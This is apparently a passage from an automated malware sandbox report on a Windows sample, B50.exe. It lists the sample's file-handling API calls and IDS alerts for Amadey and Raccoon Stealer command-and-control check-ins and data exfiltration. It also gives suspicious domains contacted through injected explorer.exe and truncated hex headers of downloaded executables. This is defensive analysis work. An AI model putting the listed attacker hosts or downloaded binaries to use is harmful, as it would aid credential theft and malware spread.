                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00578A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_005714D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_005712E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00576090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00579930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00579BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00579D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,

                          Networking:

                          barindex
                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.3:49873 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.3:49877 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49878 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49897 -> 185.163.204.24:80
                          Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49913 -> 185.163.204.24:80
                          Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49913 -> 185.163.204.24:80
                          Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49897 -> 185.163.204.24:80
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:02 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:07 GMTContent-Type: application/x-msdos-programContent-Length: 323584Connection: closeLast-Modified: Fri, 14 Jan 2022 03:59:02 GMTETag: "4f000-5d582d2c452d6"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 7a 3c cc e1 1b 52 9f e1 1b 52 9f e1 1b 52 9f ff 49 c7 9f fb 1b 52 9f ff 49 d1 9f 67 1b 52 9f c6 dd 29 9f e2 1b 52 9f e1 1b 53 9f 3e 1b 52 9f ff 49 d6 9f db 1b 52 9f ff 49 c6 9f e0 1b 52 9f ff 49 c3 9f e0 1b 52 9f 52 69 63 68 e1 1b 52 9f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e4 e0 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f6 03 00 00 a8 12 00 00 00 00 00 d0 c3 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 16 00 00 04 00 00 24 33 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 f1 03 00 28 00 00 00 00 10 16 00 b8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 16 00 f0 1d 00 00 90 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 62 f4 03 00 00 10 00 00 00 f6 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 11 00 00 10 04 00 00 18 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 75 62 6f 6d 00 00 05 00 00 00 00 e0 15 00 00 02 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 61 6b 00 00 00 00 ea 00 00 00 00 f0 15 00 00 02 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 61 77 61 78 69 67 93 0d 00 00 00 00 16 00 00 0e 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 83 00 00 00 10 16 00 00 84 00 00 00 24 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 47 00 00 00 a0 16 00 00 48 00 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:40 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:44 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:54 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:57 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
